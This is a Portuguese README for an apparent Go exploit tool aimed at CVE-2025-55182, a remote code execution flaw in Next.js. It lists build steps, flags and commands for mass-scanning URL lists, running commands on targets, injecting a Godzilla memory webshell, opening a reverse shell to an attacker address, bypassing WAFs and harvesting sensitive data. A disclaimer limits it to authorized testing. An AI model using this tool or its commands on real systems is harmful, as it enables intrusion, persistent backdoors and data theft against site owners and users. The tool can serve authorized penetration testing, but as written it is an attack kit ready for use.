Ferramenta de varredura e exploração baseada em Go para CVE-2025-55182 (RCE no Next.js). Suporta varredura em lote, execução de comandos, injeção de shell de memória Godzilla, reverse shell e bypass de WAF.
Ferramenta de varredura e exploração da CVE-2025-55182, voltada para a vulnerabilidade de execução remota de código em aplicações Next.js. Suporta detecção em lote, execução de comandos, injeção de memory shell do Godzilla e funcionalidade de reverse shell.
⚠️ Esta ferramenta destina-se apenas à pesquisa de segurança e a testes autorizados; não a utilize para fins ilegais.
.txt.success.json, e opcionalmente exporta as URLs vulneráveis para um arquivo especificado.[
]
git clone https://github.com/luoqichen/CVE-2025-55182-POC.git
cd cve-2025-55182-POC
go build -o cve-2025-55182 main.go
./cve-2025-55182 -h
| Parâmetro | Tipo | Valor padrão | Descrição |
|---|---|---|---|
-u | string | nenhum | URL de um único alvo (ex.: http://example.com:3000) |
-f | string | nenhum | Arquivo contendo uma lista de URLs (uma por linha) |
-d | string | nenhum | Pasta contendo vários arquivos .txt |
-o | string | nenhum | Arquivo de saída (salva as URLs vulneráveis, uma por linha) |
-t | int | 10 | Número de threads concorrentes |
-to | int | 10 | Tempo limite (timeout) da solicitação (segundos) |
-c | string | nenhum | Comando a ser executado (ex.: id) |
-m | string | nenhum | Modo: waf (ativa o bypass de WAF) |
-p | string | nenhum | Proxy HTTP (ex.: http://127.0.0.1:8080) |
-g | bool | false | Ativa a injeção de memory shell Godzilla |
-rs | string | nenhum | Endereço do reverse shell (formato IP:PORT) |
-dv | bool | false | Modo detalhado (exibe o processo de varredura de cada URL) |
-es | bool | false | Modo de varredura de informações sensíveis |
./cve-2025-55182 -u http://target.com:3000
./cve-2025-55182 -f targets.txt -t 20 -o vuln.txt
./cve-2025-55182 -u http://target.com:3000 -c "whoami"
./cve-2025-55182 -u http://target.com:3000 -g
Após a injeção bem-sucedida, a ferramenta exibirá o endereço de conexão, a senha, a chave e as informações do cabeçalho da requisição do Godzilla.
./cve-2025-55182 -u http://target.com:3000 -rs 10.0.0.1:4444
./cve-2025-55182 -f targets.txt -p http://127.0.0.1:8080 -t 10
success.json: salva automaticamente as informações detalhadas de todos os alvos explorados com sucesso (incluindo saída de comandos, configuração do Godzilla, etc.).-o: salva a lista de URLs vulneráveis (uma por linha).Durante a varredura, uma barra de progresso e as vulnerabilidades encontradas são exibidas em tempo real; ao final, as estatísticas são exibidas.
-p para configurar o proxy.-to.Esta ferramenta é destinada exclusivamente à pesquisa de segurança e a testes autorizados. O usuário assume toda a responsabilidade legal pelos seus atos. Os desenvolvedores não se responsabilizam por qualquer uso indevido.